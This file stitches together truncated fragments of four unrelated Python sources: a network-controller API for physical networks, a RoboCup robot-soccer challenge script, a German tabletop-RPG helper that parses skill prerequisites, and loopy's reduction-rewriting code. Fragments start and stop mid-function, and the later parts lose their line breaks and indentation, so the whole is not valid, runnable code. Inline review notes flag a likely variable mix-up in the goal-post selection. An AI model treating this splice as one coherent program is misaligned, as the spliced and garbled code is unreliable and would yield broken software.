        for network in networks:
            #
            # deepcopy every networks elements
            # case:[network]*N point to same object will auto create same id
            #
            network = copy.deepcopy(network)
            if 'id' not in network:
                network['id'] = str(uuid1())
            phynetkey = PhysicalNetwork.default_key(network['id'])
            if phynetkey in parameter_dict:
                raise ValueError("Repeated ID: " + network['id'])
            parameter_dict[phynetkey] = network
        await call_api(self.app_routine, 'objectdb', 'asyncwritewalk',
                       {"asyncwalker": dispatch_async_walker(parameter_dict,
                                                             True,
                                                             create_physicalnetwork_gettype,
                                                             'createphysicalnetwork',
                                                             direct_get_type=True),
                        "withtime": True})
        return await self._dumpkeys(parameter_dict)

    async def updatephysicalnetwork(self, id: str, **kwargs: {'?vnirange': [tuple_((int, int))],
                                                              "?vlanrange": [tuple_((int, int))]}):
        """
        Update physical network with the specified ID.

        :param id: physical network ID

        :param \*\*kwargs: attributes to be updated, usually the same attributes for creating.

        :return: A dictionary of information of the updated physical network.
        """
        network = {"id":id}
        network.update(kwargs)
        return await self.updatephysicalnetworks([network])

    @checked
    async def updatephysicalnetworks(self,networks: [{"id": str,
                                                      '?vnirange': [tuple_((int, int))],
                                                      "?vlanrange": [tuple_((int, int))]}]):
        """
        Update multiple physical networks in a transaction

        :param networks: a list of dictionaries, each contains parameters of
                         ``updatephysicalnetwork``

        :return: A list of dictionaries of information of the updated physical network.
        """
        # networks [{"id":phynetid,....}]
        parameter_dict = OrderedDict()
        for network in networks:
            # the type determines the driver, so it can never be changed in place
            if 'type' in network:
                raise ValueError("physical network type can't be changed")
            phynetkey = PhysicalNetwork.default_key(network['id'])
            if phynetkey in parameter_dict:
                raise ValueError("Repeated ID: "+network['id'])
            parameter_dict[phynetkey] = network
        await call_api(self.app_routine, 'objectdb', 'asyncwritewalk',
                       {"asyncwalker": dispatch_async_walker(parameter_dict,
                                                             False,
                                                             physicalnetwork_gettype,
                                                             'updatephysicalnetwork'),
                        "withtime": True})
        return await self._dumpkeys(parameter_dict)

    async def deletephysicalnetwork(self, id: str):
        """
        Delete physical network with specified ID

        :param id: Physical network ID

        :return: ``{"status": "OK"}``
        """
        network = {"id":id}
        return await self.deletephysicalnetworks([network])

    @checked
    async def deletephysicalnetworks(self,networks: [{"id": str}]):
        """
        Delete multiple physical networks with a transaction

        :param networks: a list of ``{"id": <id>}`` dictionaries.

        :return: ``{"status": "OK"}``
        """
        # networks [{"id":id},{"id":id}]
        parameter_dict = {}
        for network in networks:
            phynetkey = PhysicalNetwork.default_key(network['id'])
            if phynetkey in parameter_dict:
                raise ValueError("Repeated ID: "+network['id'])
            parameter_dict[phynetkey] = network
        await call_api(self.app_routine, 'objectdb', 'asyncwritewalk',
                       {"asyncwalker": dispatch_async_walker(parameter_dict,
                                                             False,
                                                             physicalnetwork_gettype,
                                                             'deletephysicalnetwork'),
                        "withtime": True})
        return {"status":'OK'}

    async def listphysicalnetworks(self,id = None,**kwargs):
        """
        Query physical network information

        :param id: If specified, only return the physical network with the specified ID.

        :param \*\*kwargs: customized filters, only return a physical network if
                           the attribute value of this physical network matches
                           the specified value.

        :return: A list of dictionaries each stands for a matched physical network
        """
        def set_walker(key,set,walk,save):
            # Walk every network referenced from the set and save those whose
            # attributes match all the provided filters.
            if set is None:
                return
            for refnetwork in set.dataset():
                networkkey = refnetwork.getkey()
                with suppress(WalkKeyNotRetrieved):
                    networkobj = walk(networkkey)
                    if all(getattr(networkobj,k,None) == v for k,v in kwargs.items()):
                        save(networkkey)
        def walker_func(set_func):
            # Adapt set_walker to the (key, obj, walk, save) walker signature.
            def walker(key,obj,walk,save):
                if obj is None:
                    return
                set_walker(key,set_func(obj),walk,save)
            return walker
        # get all phynet
        if not id:
            physetkey = PhysicalNetworkSet.default_key()
            # an unique id used to unwatch
            self._reqid += 1
            reqid = ('viperflow',self._reqid)
            with request_context(reqid, self.app_routine):
                _, values = await call_api(self.app_routine,'objectdb','walk',
                                           {'keys':[physetkey],
                                            'walkerdict':{physetkey:walker_func(lambda x:x.set)},
                                            'requestid':reqid})
                return [dump(r) for r in values]
        else:
            # get that id phynet info
            phynetkey = PhysicalNetwork.default_key(id)
            return await self._dumpone(phynetkey,kwargs)

    async def createphysicalport(self,physicalnetwork: str, name: str, vhost: str='',
                                 systemid: str='%', bridge: str='%', **kwargs):
        """
        Create physical port

        :param physicalnetwork: physical network this port is in.

        :param name: port
        """
        # NOTE(review): this method is truncated here in the visible range;
        # the rest of the docstring and the body are outside this chunk.
# Copyright 2018-2019 <NAME>)
# SPDX-License-Identifier: Apache-2.0
from robotScenarioBase import *
from FalconsCoordinates import Vec2d, RobotPose
from math import pi
import logging

# Script for Robocup World Championship 2018, tech challenge run 1
# Conditions:
#   two robots, wifi on, normal MSL field and lighting
#   4 randomly placed, colored obstacles (not black!)
#   normal ball and black/white official ball
#   --> Input Andre: cannot handle black/white ball, stick to normal MSL ball for now
#       (too bad, 30% of points cannot be attained)
#
# It is not really clear if we can choose playing direction based on obstacles positions.
# Rules suggest that robots are placed, then balls based on robots, finally obstacles.
# But thanks to the new heightmap (awesome suggestion by Coen) we should be OK.
#
# Roles are based on starting position: the one close to field center gets main role 1, other support role 2
#
# Tricks/steps to perform:
# 1: pass over the ground 3 times (both robots)
# 2: shoot in goal 3 times (only main robot)
# 3: shoot at pole over the ground 3 times (only main robot)
# 4: shoot at bar 3 times (require support robot to catch and pass back)
# 5: lob pass, 8m away from each other (require support robot to catch and pass back)
# Tricks 4 and 5 are considered 'advanced'.
# R prefix: which role

TRICK_SEQUENCE = [2, 3, 4, 5]
MAIN_PLAYER_ONLY = False
SIMULATION = True
FIELD_SIZE = 1 # 0 is small (Canada), 1 is normal (Locht) and 2 is large (2018+)
FIELD_SIZE_Y = [5.8, 9, 11][FIELD_SIZE]
FIELD_SIZE_X = [5, 6, 7][FIELD_SIZE]
PENALTY_AREA_SIZE_Y = 2.25 # same for large field
GOAL_WIDTH = [2.42, 2.0, 2.4][FIELD_SIZE]
GOAL_POST_WIDTH = [0.10, 0.125, 0.10][FIELD_SIZE]
INTERCEPT_RADIUS_SMALL = 3.0
INTERCEPT_RADIUS_LARGE = 6.0
FORWARD_PHI = 0.5*pi
BACKWARD_PHI = 1.5*pi
PENALTY_Y = FIELD_SIZE_Y - 3 # rules: 3m from the goal, regardless of size
R1_START_POS = (0, 2*(FIELD_SIZE == 0))
R2_START_POS = (0, -4)
LANE_X_POSITION = 0.0 # calculated by _determineLaneX and used to override passing & lob bar x positions, avoiding obstacles as good as possible
R1_SEARCH_BALL_POS = (0, PENALTY_Y)
SLEEP_SETTLE = 1.0
SLEEP_AFTER_KICK = 1.0 # large enough to not immediately chase the ball, but short enough to get moving to next position (see _waitUntilPassReceiverReady)
NUM_DOUBLE_PASSES = 2 # 3 passes is sufficient but with an even number the ball is back at role1; 2 means twice from r1 to r2 and back
NUM_LOB_PASSES = 5 - 3 * SIMULATION
NUM_SIMPLE_GOALS = 4 - 2 * SIMULATION
NUM_GOAL_POST_HITS = 5 - 3 * SIMULATION
NUM_GOAL_BAR_HITS = 4 - 2 * SIMULATION
SIMPLE_GOAL_POWER = 50.0 + (20.0 * SIMULATION)
GOAL_POST_HIT_POWER = 45.0 + (8.0 * SIMULATION)
# UNUSED -- we use motionPlanning pass action including its power setpoint calculation
GOAL_BAR_KICK_POWER = 77.0 # tuned on robot 4 at Canada
GOAL_BAR_KICK_HEIGHT = 150 # tuned on robot 4 at locht, may 22 [MVEH]
LOB_PASS_KICK_POWER = 86.0
LOB_PASS_KICK_HEIGHT = 200
TOLERANCE_FINE_XY = 0.01
TOLERANCE_FINE_PHI = 0.005
OBSTACLE_CLOSEBY_LIMIT = 0.7

# all local functions are prefixed with an underscore _
# to be able to filter them in robotLibrary scenario selector

###### utility functions ######

def _log(s):
    # Single logging funnel for the scenario.
    logging.info(s)

def _waitUntilBothActive():
    # Block until at least one teammate is reported active
    # (no-op in single-player mode).
    if MAIN_PLAYER_ONLY:
        return
    tt = robot.teamMembers()
    while len(tt) < 1:
        sleep(1)
        tt = robot.teamMembers()

def _waitTeamHasBall():
    # Block until any robot of the team possesses the ball.
    _log("waiting until team has the ball ...")
    while not robot.teamHasBall():
        sleep(1)
    _log("team has the ball")

def _ensureHasBall():
    # Fetch the ball unless this robot already has it.
    if not robot.hasBall():
        _log("ensuring we have the ball")
        robot.getBall()

def _determineTrickSequence():
    # TODO based on starting orientation, skip some steps?
    # however, rules do not allow adding points from separate attempts, each attempt is a full restart
    # so this is not useful during techChallenge (only useful during dev / test / tuning)
    return TRICK_SEQUENCE

def _friendPosition():
    # Position of the first (and only) teammate.
    return robot.getPosition(robot.teamMembers()[0])

def _friendVelocity():
    return robot.getVelocity(robot.teamMembers()[0])

def _friendIsMoving():
    # Teammate is considered moving above a small xy-speed threshold.
    if MAIN_PLAYER_ONLY:
        return False
    return (_friendVelocity().xy().size() > 0.1)

def _calcPassMainPos():
    # assume robot just got the ball - use its position and face into direction where supporter should stand
    result = robot.getPosition()
    result.Rz = BACKWARD_PHI
    return (result.x, result.y, result.Rz)

def _calcPassSupportPos():
    # calculate based on friend position, rely on use moveToFreeSpotNearPosition
    result = _friendPosition()
    result.y = -3 # position at other half
    result.Rz = FORWARD_PHI
    return (result.x, result.y, result.Rz)

def _calcAdvancedSupportPos():
    return (LANE_X_POSITION, -4, FORWARD_PHI)

def _determineLaneX():
    # sync: wait until both robots stand still
    #   main robot on penalty position
    #   support robot on (0,-4)
    # this should give a good view on where the obstacles are
    # the robot calling this function is already standing still
    # so the sync is achieved by waiting on the other
    global LANE_X_POSITION
    if MAIN_PLAYER_ONLY:
        LANE_X_POSITION = 0
        return
    while _friendIsMoving():
        sleep(0.5)
    # calculate: sample candidate x positions within the goal mouth and pick
    # the one with the largest clearance to the nearest obstacle
    bestDist = 0.0
    numX = 5
    limX = GOAL_WIDTH * 0.5 - 0.2
    x = -limX
    bestX = x
    stepX = 2 * limX / numX
    for iX in range(numX+1):
        x = -limX + iX * stepX
        minDist = 9
        for obst in robot.obstacles():
            minDist = min(minDist, abs(obst[0] - x))
        if minDist > bestDist:
            bestDist = minDist
            bestX = x
    # store result
    LANE_X_POSITION = bestX
    _log('choosing lane at x = %6.2f' % (bestX))

def _waitUntilPassReceiverReady():
    # TODO also use distance? probably not robust enough...
    _log("waiting until pass receiver ready ...")
    while _friendIsMoving():
        sleep(0.5)
    _log("pass receiver is ready")

def _calcSimpleGoalPos():
    # TODO avoid any obstacle nearby goal? NO, choose starting orientation such that penalty spot can be used
    return (0, PENALTY_Y, FORWARD_PHI)

def _calcGoalPostPos():
    # choose goalpost with no obstacle nearby
    posX = 0.5 * GOAL_WIDTH + 0.5 * GOAL_POST_WIDTH
    posLeft = Vec2d(-posX, FIELD_SIZE_Y)
    posRight = Vec2d(posX, FIELD_SIZE_Y)
    chooseLeft = True
    try:
        obstLeft = robot.findClosestObstacle(posLeft)
        distLeft = (obstLeft - posLeft).size()
        obstRight = robot.findClosestObstacle(posRight)
        # NOTE(review): `obstLeft` below looks like a copy-paste slip —
        # presumably `obstRight` was intended; verify before relying on
        # the right-post distance.
        distRight = (obstLeft - posRight).size()
        if distRight < distLeft:
            chooseLeft = False
    # NOTE(review): bare except silently falls back to the left post when
    # obstacle lookup fails; consider narrowing the exception type.
    except:
        pass
    result = posRight
    if chooseLeft:
        result = posLeft
    return (result.x, result.y, FORWARD_PHI)

def _interceptWrapper(x, y, phi=0, radius=INTERCEPT_RADIUS_SMALL, repositionRadius=INTERCEPT_RADIUS_SMALL):
    # ideally we use teamplay stuff, rather than restoring old python interceptBall
    _log("receiving pass ...")
    robot.behavior("RECEIVE_PASS")
    sleep(1)
    # TODO: avoid that robot gets the ball if it is closer to the other robot
    if not robot.hasBall():
        _log("intercept fallback getBall")
        robot.getBall()
    # NOTE(review): the string below is dead code kept as documentation of the
    # previous zoneInterceptBall-based implementation.
    """
    # robust intercept wrapper
    # postcondition: robot has the ball
    # large intercept radius already helps a lot due to the fallback inside that function,
    # but we should be careful that other robot does not decide to go into fallback and interfere!
    zoneInterceptBall(x, y, phi, radius, repositionRadius)
    # fallback getBall (TODO also searchball? no, anticipate multiCam + it is unlikely that we let the ball slip away beyond vision)
    """

def _passToTeamMember():
    sleep(SLEEP_SETTLE)
    # use motionPlanning pass action to first teammember, not teamplay
    friendPos = robot.getPosition(robot.teamMembers()[0])
    _log("passing to (%6.2f, %6.2f)" % (friendPos.x, friendPos.y))
    robot.passTo(friendPos.x, friendPos.y)
    sleep(SLEEP_AFTER_KICK)

def _receivePass(radius=INTERCEPT_RADIUS_SMALL):
    # use zoneInterceptBall on current position
    pos = robot.ownPosition()
    _interceptWrapper(pos.x, pos.y, pos.Rz, radius=radius)
    # it exits only when robot has ball

def _safeMove(*target):
    # We might need this wrapper because of the following things:
    # 1. when robot has fetched the ball, but there is an obstacle closeby, then tokyoDrift rotation will likely cause a collision
    #    so we should first drive away from obstacle using robotspeed.
    #    I consider this a limitation of pathPlanning, so in future it should be implemented there.
    # 2. if there is an obstacle at the target position, the robot will either never arrive (because pathPlanning obstacle avoidance will dance around it)
    #    or push the obstacle aside, causing a collision.
    # 3. it might be the case that there is an obstacle between target position and ball, causing the robot to not see the ball anymore.
    #    We do not want to explicitly search ball.
    #
    # Possible solution: use a new test-specific heightmap and corresponding action. Furthermore, start with a small drive-backwards fallback.
    #
    # TODO - see version in techChallenge branch -- can we avoid all that complexity by improving tp/pp?
    robot.move(*target)
    # TODO: behavior POSITION_TO_FREE_SPOT?

###### role and trick distribution ######

def TC18_run1():
    # initialize
    _waitUntilBothActive()
    trickSequence = _determineTrickSequence() # might skip parts of sequence based on starting orientation
    # TODO: disable goal area obstacle avoidance - we want to be able to get a ball from goal
    # TODO tuning: reduce rotation speed&acc with ball to
    # NOTE(review): this function is truncated here in the visible range.
# -*- coding: utf-8 -*-
"""
Created on Sat Feb 18 16:35:08 2017

@author: Aeolitus
"""
import Definitionen
import logging
import unicodedata
import os
import re
from Wolke import Wolke
import Objekte

class VoraussetzungException(Exception):
    # Raised for malformed or unresolvable prerequisite ("Voraussetzung") strings.
    pass

class WaffeneigenschaftException(Exception):
    # Raised for unknown or malformed weapon properties ("Waffeneigenschaften").
    pass

class Hilfsmethoden:
    '''
    Static helper methods. Call either as:
        import Hilfsmethoden
        Hilfsmethoden.Hilfsmethoden.XYZ
    or as:
        from Hilfsmethoden import Hilfsmethoden
        Hilfsmethoden.XYZ
    '''
    @staticmethod
    def GetWaffeneigenschaft(WaffeneigenschaftStr, Datenbank):
        '''
        Look up a weapon property by its (possibly parameterized) string form,
        e.g. "Name" or "Name(param1;param2)". Raises WaffeneigenschaftException
        when the name is unknown or an opening parenthesis is never closed.
        '''
        weName = WaffeneigenschaftStr
        # strip an optional "(...)" parameter list to get the bare name
        index = weName.find("(")
        if index != -1:
            weName = str.strip(weName[:index])
        if not weName in Datenbank.waffeneigenschaften:
            raise WaffeneigenschaftException("Unbekannte Waffeneigenschaft '" + weName + "'")
        if index != -1:
            endIndex = WaffeneigenschaftStr[index:].find(")")
            if endIndex == -1:
                raise WaffeneigenschaftException("Parameter der Waffeneigenschaft '" + weName + "' müssen mit ')' abgeschlossen werden. Mehrere Parameter werden mit Semikolon getrennt.")
        return Datenbank.waffeneigenschaften[weName]

    @staticmethod
    def VerifyWaffeneigenschaft(WaffeneigenschaftStr, Datenbank):
        # Validation-only wrapper: raises on invalid input, result is discarded.
        we = Hilfsmethoden.GetWaffeneigenschaft(WaffeneigenschaftStr, Datenbank)

    @staticmethod
    def FertStr2Array(FertString, Datenbank = None):
        '''
        Skills ("Fertigkeiten") are entered by the user as a comma-separated
        string. This helper splits the string and returns an array of the
        individual skills. When a database is given, unknown skills are
        silently dropped.
        '''
        retArr = []
        for itm in FertString.split(","):
            if len(itm) == 0:
                continue
            strpItm = itm.strip()
            if len(strpItm) > 0:
                if (Datenbank is None) or (strpItm in Datenbank.fertigkeiten ) or (strpItm in Datenbank.übernatürlicheFertigkeiten):
                    retArr.append(strpItm)
        return retArr

    @staticmethod
    def FertArray2Str(Arr, Datenbank = None):
        '''
        Converts the internally used skill arrays back into a
        comma-separated string.
        '''
        retStr = ""
        if len(Arr) > 0:
            retStr = Arr[0]
            for itm in Arr[1:]:
                retStr += ", "
                retStr += itm
        return retStr

    @staticmethod
    def VorStr2Array(VoraussetzungenString, Datenbank):
        '''
        Prerequisites ("Voraussetzungen") are entered by the user as free
        text. The format is illustrated by the following example:
            "Kein Vorteil Eisenaffine Aura, Attribut MU 8 ODER Vorteil Geweiht I ODER Vorteil Emphatie, Waffeneigenschaft Rüstungsbrechend"
        Case matters! "Kein" is not supported for attributes.

        Each comma-separated item becomes one encoded entry of the form
        "<kind>~<name>~<value>"; "ODER"-alternatives become nested lists.
        '''
        # '~' separates the encoded fields of one prerequisite entry
        delim = "~"
        retArr = []
        for itm in VoraussetzungenString.split(","):
            if len(itm) == 0:
                continue
            arrItm = ""
            strpItm = itm.strip()
            if " ODER " in strpItm:
                # alternatives are encoded recursively as a nested list
                subArr = []
                for entr in strpItm.split(" ODER "):
                    subArr.append(Hilfsmethoden.VorStr2Array(entr, Datenbank))
                arrItm = subArr
            else:
                if strpItm.startswith("Vorteil "):
                    if not (strpItm[8:] in Datenbank.vorteile):
                        raise VoraussetzungException("Kann Vorteil '" + strpItm + "' in der Datenbank nicht finden.")
                    arrItm = "V" + delim + strpItm[8:] + delim + "1"
                elif strpItm.startswith("Kein Vorteil "):
                    if not (strpItm[13:] in Datenbank.vorteile):
                        raise VoraussetzungException("Kann Vorteil '" + strpItm + "' in der Datenbank nicht finden.")
                    arrItm = "V" + delim + strpItm[13:] + delim + "0"
                elif strpItm.startswith("Talent "):
                    if not (strpItm[7:] in Datenbank.talente):
                        raise VoraussetzungException("Kann Talent '" + strpItm + "' in der Datenbank nicht finden.")
                    arrItm = "T" + delim + strpItm[7:] + delim + "1"
                elif strpItm.startswith("Waffeneigenschaft "):
                    if (not (strpItm[18:] in Datenbank.waffeneigenschaften)) and strpItm[18:] != "Nahkampfwaffe" and strpItm[18:] != "Fernkampfwaffe":
                        raise VoraussetzungException("Kann keine Waffeneigenschaft '" + strpItm + "' in der Datenbank finden.")
                    arrItm = "W" + delim + strpItm[18:] + delim + "1"
                elif strpItm.startswith("Attribut "):
                    attribut = strpItm[9:11]
                    if attribut in Definitionen.Attribute:
                        try:
                            wert = int(strpItm[12:])
                            arrItm = "A" + delim + attribut + delim + str(wert)
                        except ValueError:
                            raise VoraussetzungException("Der angegebene Attribut-Wert '" + strpItm[12:] + "' ist keine gültige Zahl.")
                    else:
                        raise VoraussetzungException("Das angegebene Attribut '" + attribut + "' ist ungültig. Unterstützt werden 'KO', 'MU', 'GE', 'KK', 'IN', 'KL', 'CH' und 'FF'")
                elif strpItm.startswith("MeisterAttribut "):
                    attribut = strpItm[16:18]
                    if attribut in Definitionen.Attribute:
                        try:
                            wert = int(strpItm[19:])
                            arrItm = "M" + delim + attribut + delim + str(wert)
                        except ValueError:
                            raise VoraussetzungException("Der angegebene Attribut-Wert '" + strpItm[19:] + "' ist keine gültige Zahl.")
                    else:
                        raise VoraussetzungException("Das angegebene Attribut '" + attribut + "' ist ungültig. Unterstützt werden 'KO', 'MU', 'GE', 'KK', 'IN', 'KL', 'CH' und 'FF'")
                elif strpItm.startswith("Übernatürliche-Fertigkeit "):
                    # the skill name must be enclosed in apostrophes
                    if not strpItm[26] == "'":
                        raise VoraussetzungException("Der Name einer Übernatürlichen Fertigkeit muss in Apostrophen gefasst werden. (" + strpItm + ")")
                    strpItm = strpItm[27:]
                    index = strpItm.find("'")
                    if index == -1:
                        raise VoraussetzungException("Der Name einer Übernatürlichen Fertigkeit muss in Apostrophen gefasst werden. (" + strpItm + ")")
                    fertigkeit = strpItm[:index]
                    if not (fertigkeit in Datenbank.übernatürlicheFertigkeiten):
                        raise VoraussetzungException("Kann Übernatürliche Fertigkeit '" + fertigkeit + "' in der Datenbank nicht finden.")
                    try:
                        wert = int(strpItm[index+2:])
                        arrItm = "U" + delim + fertigkeit + delim + str(wert)
                    except ValueError:
                        raise VoraussetzungException("Der angegebene Fertigkeitswert '" + strpItm[index+2:] + "' ist keine gültige Zahl")
                elif strpItm.startswith("Fertigkeit "):
                    if not strpItm[11] == "'":
                        raise VoraussetzungException("Der Name einer Fertigkeit muss in Apostrophen gefasst werden. . (" + strpItm + ")")
                    strpItm = strpItm[12:]
                    index = strpItm.find("'")
                    if index == -1:
                        raise VoraussetzungException("Der Name einer Fertigkeit muss in Apostrophen gefasst werden. . (" + strpItm + ")")
                    fertigkeit = strpItm[:index]
                    if not (fertigkeit in Datenbank.fertigkeiten):
                        raise VoraussetzungException("Kann Fertigkeit '" + fertigkeit + "' in der Datenbank nicht finden.")
                    try:
                        wert = int(strpItm[index+2:])
                        arrItm = "F" + delim + fertigkeit + delim + str(wert)
                    except ValueError:
                        raise VoraussetzungException("Der angegebene Fertigkeitswert '" + strpItm[index+2:] + "' ist keine gültige Zahl")
                else:
                    raise VoraussetzungException("Unbekanntes Schlüsselwort '" + strpItm + "'. Unterstützt werden 'Vorteil', 'Kein Vorteil', 'Waffeneigenschaft', 'Attribut', 'MeisterAttribut', 'Übernatürliche-Fertigkeit' und 'Fertigkeit'.")
            retArr.append(arrItm)
        return retArr

    @staticmethod
    def VorArray2Str(VoraussetzungenArray, Datenbank = None):
        '''
        Inverse of VorStr2Array: converts the encoded prerequisite array back
        into the user-facing comma-separated text form.
        '''
        delim = "~"
        retArr = []
        retStr = ""
        for itm in VoraussetzungenArray:
            if type(itm) is list:
                # nested list = "ODER"-alternatives; render them recursively
                orArr = []
                orStr = ""
                for part in itm:
                    orArr.append(Hilfsmethoden.VorArray2Str(part, Datenbank))
                if len(orArr) > 0:
                    orStr = orArr[0]
                    if len(orArr) > 1:
                        for ent in orArr[1:]:
                            orStr += " ODER " + ent
                if orStr != "":
                    retArr.append(orStr)
            else:
                # decode "<kind>~<name>~<value>" back into its text form
                arr = itm.split(delim)
                enStr = ""
                if arr[0] == "V":
                    if arr[2] == "1":
                        enStr += "Vorteil "
                    else:
                        enStr += "Kein Vorteil "
                    enStr += arr[1]
                elif arr[0] == "T":
                    enStr += "Talent "
                    enStr += arr[1]
                elif arr[0] == "W":
                    enStr += "Waffeneigenschaft "
                    enStr += arr[1]
                elif arr[0] == "A":
                    enStr += "Attribut "
                    enStr += arr[1]
                    enStr += " "
                    enStr += str(arr[2])
                elif arr[0] == "M":
                    enStr += "MeisterAttribut "
                    enStr += arr[1]
                    enStr += " "
                    enStr += str(arr[2])
                elif arr[0] == "U":
                    enStr += "Übernatürliche-Fertigkeit "
                    enStr += "'" + arr[1] + "' "
                    enStr += str(arr[2])
                elif arr[0] == "F":
                    enStr += "Fertigkeit "
                    enStr += "'" + arr[1] + "' "
                    enStr += str(arr[2])
                if enStr != "":
                    retArr.append(enStr)
        if len(retArr) > 0:
            retStr = retArr[0]
            if len(retArr) > 1:
                for itm in retArr[1:]:
                    if len(itm) > 0:
                        retStr += ", " + itm
        return retStr

    # NOTE(review): the following method is truncated in the visible range;
    # its signature continues beyond this chunk.
    @staticmethod
    def voraussetzungenPrüfen(vorteile, waffen, attribute,
übernatürlicheFertigkeiten, fertigkeiten, voraussetzungen): return Hilfsmethoden.__voraussetzungenPrüfen(vorteile, waffen, attribute, übernatürlicheFertigkeiten, fertigkeiten, voraussetzungen, False) @staticmethod def __voraussetzungenPrüfen(vorteile, waffen, attribute, übernatürlicheFertigkeiten, fertigkeiten, voraussetzungen, Or): ''' Prüft, ob ein Array von Voraussetzungen erfüllt ist. Format: ['L:Str:W', 'L:Str:W'] Dabei ist L: V für Vorteil - prüft, ob ein Vorteil vorhanden ist. W = 1 bedeutet, der Vorteil muss vorhanden sein. W=0 bedeutet, der Vorteil darf nicht vorhanden sein. T für Talent - prüft, ob der Charakter ein Talent mit dem angegebenen Namen besitzt. W ist immer 1. W für Waffeneigenschaft - prüft, ob der Charakter eine Waffe mit der angegebenen Eigenschaft besitzt. W ist immer 1. A für Attribut - prüft, ob das Attribut mit Key Str mindestens auf Wert W ist M für MeisterAttribut - wie Attribut, prüft außerdem ob zwei weitere Attribute auf insg. mindestens 16 sind U für Übernatürliche Fertigkeit - prüft, ob für die Übernatürliche Fertigkeit mit Key Str die Voraussetzungen erfüllt sind \ und sie mindestens auf Wert W ist. W=-1 hat ein spezielle Bedeutung, hier wird an Stelle des Fertigkeitswerts überprüft ob mindestens ein Talent aktiviert ist. F für Fertigkeit - prüft, ob für die Übernatürliche Fertigkeit mit Key Str die Voraussetzungen erfüllt sind und sie mindestens auf Wert W ist. Einträge im Array können auch weitere Arrays and Voraussetzungen sein. Aus diesen Arrays muss nur ein Eintrag erfüllt sein. Wenn Wolke.Reqs nicht gesetzt ist, gibt die Methode immer True zurück. ''' if not Wolke.Reqs: return True #Gehe über alle Elemente in der Liste retNor = True retOr = False for voraus in voraussetzungen: erfüllt
return prim.If(rec_cond, self.rec(expr.then, callables_table=callables_table, guarding_predicates=( guarding_predicates | frozenset([rec_cond])), nresults=nresults), self.rec(expr.else_, callables_table=callables_table, guarding_predicates=( guarding_predicates | frozenset([prim.LogicalNot(rec_cond)])), nresults=nresults)) # @remove_any_newly_unused_inames def realize_reduction_for_single_kernel(kernel, callables_table, insn_id_filter=None, unknown_types_ok=True, automagic_scans_ok=False, force_scan=False, force_outer_iname_for_scan=None): """Rewrites reductions into their imperative form. With *insn_id_filter* specified, operate only on the instruction with an instruction id matching *insn_id_filter*. If *insn_id_filter* is given, only the outermost level of reductions will be expanded, inner reductions will be left alone (because they end up in a new instruction with a different ID, which doesn't match the filter). If *insn_id_filter* is not given, all reductions in all instructions will be realized. If *automagic_scans_ok*, this function will attempt to rewrite triangular reductions as scans automatically. If *force_scan* is *True*, this function will attempt to rewrite *all* candidate reductions as scans and raise an error if this is not possible (this is most useful combined with *insn_id_filter*). If *force_outer_iname_for_scan* is not *None*, this function will attempt to realize candidate reductions as scans using the specified iname as the outer (sweep) iname. 
""" logger.debug("%s: realize reduction" % kernel.name) new_insns = [] new_iname_tags = {} insn_id_gen = kernel.get_instruction_id_generator() var_name_gen = kernel.get_var_name_generator() new_temporary_variables = kernel.temporary_variables.copy() inames_added_for_scan = set() inames_to_remove = set() # {{{ helpers def _strip_if_scalar(reference, val): if len(reference) == 1: return val[0] else: return val def preprocess_scan_arguments( insn, expr, nresults, scan_iname, track_iname, newly_generated_insn_id_set): """Does iname substitution within scan arguments and returns a set of values suitable to be passed to the binary op. Returns a tuple.""" if nresults > 1: inner_expr = expr # In the case of a multi-argument scan, we need a name for each of # the arguments in order to pass them to the binary op - so we expand # items that are not "plain" tuples here. if not isinstance(inner_expr, tuple): get_args_insn_id = insn_id_gen( "{}_{}_get".format(insn.id, "_".join(expr.inames))) inner_expr = expand_inner_reduction( id=get_args_insn_id, expr=inner_expr, nresults=nresults, depends_on=insn.depends_on, within_inames=insn.within_inames | expr.inames, within_inames_is_final=insn.within_inames_is_final, predicates=insn.predicates, ) newly_generated_insn_id_set.add(get_args_insn_id) updated_inner_exprs = tuple( replace_var_within_expr(sub_expr, scan_iname, track_iname) for sub_expr in inner_expr) else: updated_inner_exprs = ( replace_var_within_expr(expr, scan_iname, track_iname),) return updated_inner_exprs def expand_inner_reduction(id, expr, nresults, depends_on, within_inames, within_inames_is_final, predicates): # FIXME: use make_temporaries from pymbolic.primitives import Call from loopy.symbolic import Reduction assert isinstance(expr, (Call, Reduction)) temp_var_names = [ var_name_gen(id + "_arg" + str(i)) for i in range(nresults)] for name in temp_var_names: from loopy.kernel.data import TemporaryVariable, AddressSpace new_temporary_variables[name] = 
TemporaryVariable( name=name, shape=(), dtype=None, address_space=AddressSpace.PRIVATE) from pymbolic import var temp_vars = tuple(var(n) for n in temp_var_names) call_insn = make_assignment( id=id, assignees=temp_vars, expression=expr, depends_on=depends_on, within_inames=within_inames, within_inames_is_final=within_inames_is_final, predicates=predicates) generated_insns.append(call_insn) return temp_vars # }}} # {{{ sequential def map_reduction_seq(expr, rec, callables_table, nresults, arg_dtypes, reduction_dtypes, guarding_predicates): outer_insn_inames = insn.within_inames from loopy.kernel.data import AddressSpace acc_var_names = make_temporaries( name_based_on="acc_"+"_".join(expr.inames), nvars=nresults, shape=(), dtypes=reduction_dtypes, address_space=AddressSpace.PRIVATE) init_insn_depends_on = frozenset() # check first that the original kernel had global barriers # if not, we don't need to check. Since the function # kernel_has_global_barriers is cached, we don't do # extra work compared to not checking. # FIXME: Explain why we care about global barriers her if kernel_has_global_barriers(kernel): global_barrier = lp.find_most_recent_global_barrier(temp_kernel, insn.id) if global_barrier is not None: init_insn_depends_on |= frozenset([global_barrier]) from pymbolic import var acc_vars = tuple(var(n) for n in acc_var_names) init_id = insn_id_gen( "{}_{}_init".format(insn.id, "_".join(expr.inames))) expression, callables_table = expr.operation.neutral_element( *arg_dtypes, callables_table=callables_table, target=kernel.target) init_insn = make_assignment( id=init_id, assignees=acc_vars, within_inames=outer_insn_inames - frozenset(expr.inames), within_inames_is_final=insn.within_inames_is_final, depends_on=init_insn_depends_on, expression=expression, # Do not inherit predicates: Those might read variables # that may not yet be set, and we don't have a great way # of figuring out what the dependencies of the accumulator # initializer should be. 
